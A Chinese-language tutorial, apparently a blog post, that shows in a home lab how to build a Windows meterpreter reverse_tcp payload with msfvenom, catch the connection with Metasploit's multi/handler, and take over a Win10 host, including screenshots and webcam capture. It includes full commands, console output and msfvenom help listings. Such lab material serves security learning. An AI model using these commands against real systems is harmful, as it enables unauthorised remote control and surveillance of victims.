远程控制目标主机
目录
远程控制程序基础
远程控制程序可以说是一个框架,指可以在一台设备上操纵另一台设备。它包括被控端和主控端,被控端是运行在目标主机上的程序,可以是一段代码也可以是一个直接执行的程序,含义上等同于木马;主控端在攻击机上执行。
根据主控端和被控端的连接方式,可以将远程控制软件分为正向和反向。
这里主要介绍一下反向控制,大部分的远程控制软件都采用远程控制的方式。当目标主机执行被控制端后,会通知源主机“我已经被你控制啦,请下命令吧!”。因此攻击机只需要设置好等待目标主机连接的源端口和IP地址(自己的IP地址)就可以了,无需知道目标主机的IP地址。
被控端需要在攻击机中用相关工具生成,也可以自定义。
实战:远程控制目标主机
环境:主控端:Kali Linux·2020.1b
被控端:Win10
虚拟机桥接上网
步骤:
1、生成被控端
执行命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.120 lport=5000 -f exe -o /root/payload.exe
执行效果:
这个命令的作用是 msfvenom自带的payload(windows/meterpreter/reverse_tcp)生成被控制端,规定这个被控制端的类型为可执行文件和保存在Kali中的位置,并且设置等待连接的源IP地址和端口号。
windows/meterpreter/reverse_tcp其实就是可以直接在计算机中执行的代码(称为payload),只不过通过这个命令将其编译成我们需要的格式。
生成被控制端后,将这个可执行文件复制到目标主机中。
2、 在Kali Linux中启动主控端
(1) 启动Metasploit
aaa@qq.com:/# msfconsole 执行效果:
(2)启动handler模块作为主控端
msf5 > use exploit/multi/handler
(3) 设置前面生成的被控制端程序,然后等待被控制端连接
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.120
lhost => 192.168.43.120
msf5 exploit(multi/handler) > set lport 5000
lport => 5000
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.120:5000
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.120:5000
执行完最后一条命令后,双击目标主机中的payload.exe
上述命令没有执行成功,源端口改为4444后成功 ,原因可能是因为windows/meterpreter/reverse_tcp这个payload文件默认的端口为4444,在下面的介绍中会看到这一点,可能是不能修改。
在这里重新修改一次就好,上一个步骤的命令可以不用改动。
出现最后一行红框中的内容表示被控端已经被控制
(3)操纵被控制主机
参考文章:meterpreter后渗透之摄像头和录音详细用法
截图命令:screenshot
查看摄像头列表、打开摄像头拍照、
工具使用
msfvenom
该工具主要与生成攻击载荷(payload)有关。可以使用命令 msfvenom -h查看所有参数用法,参数用法与其他版本的kali有所不同。
aaa@qq.com:/# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exeOptions:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)( -f,和 --format 执行效果相同)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
从帮助文档的第一句话就可以看到,这个工具是一个payload生成器。帮助文档给的例子中” /usr/bin/msfvenom“加了路径,实际执行中不加路径也可以。
1、列出某个payload需要设置的参数。
msfvenom -p windows/meterpreter/reverse_tcp --list-options上述命令用到的参数都是可以从帮助文档中找到的。
aaa@qq.com:/# msfvenom -p windows/meterpreter/reverse_tcp --list-options
Options for payload/windows/meterpreter/reverse_tcp:
=========================
Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 283
Rank: NormalProvided by:
skape <aaa@qq.com>
sf <aaa@qq.com>
OJ Reeves
hdm <aaa@qq.com>Basic options:(基础参数设置)
Name Current Setting Required Description(分别表示参数名称、参数默认值、参数是否为必须、参数介绍)
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portDescription:
Inject the meterpreter server DLL via the Reflective Dll Injection
payload (staged). Connect back to the attackerAdvanced options for payload/windows/meterpreter/reverse_tcp:(高级参数设置)
=========================Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this moduleEvasion options for payload/windows/meterpreter/reverse_tcp:
=========================Name Current Setting Required Description
---- --------------- -------- -----------
上面加粗的部分是我们需要设置的。
2、查看生成被控制端支持的格式
aaa@qq.com:/# msfvenom -l formats
通过这个命令可以掌握到-l参数的使用方法,他的作用就是列出一些数据,包括支持的格式(formats)、payloads等。
3、payload命名规则:
windows/meterpreter/reverse_tcp就是这个payload的名字,包括三部分组成,每一部分用“/”划分。
| 针对的操作系统 | 控制方式(包括shell和meterpreter,后者较为优秀) | 模块名称(标识采用正向还是反向、以及使用哪种网络协议) |
| windows | /meterpreter | /reverse_tcp |
msfconsole
参考文章:Metasploit下的相关模块
metasploit学习之路(二) msfconsole基本使用
当控制端连接了被控端后,主控端就会打开一个Meterperter控制会话(Session),下一篇:Windows操作系统下Meterpreter的使用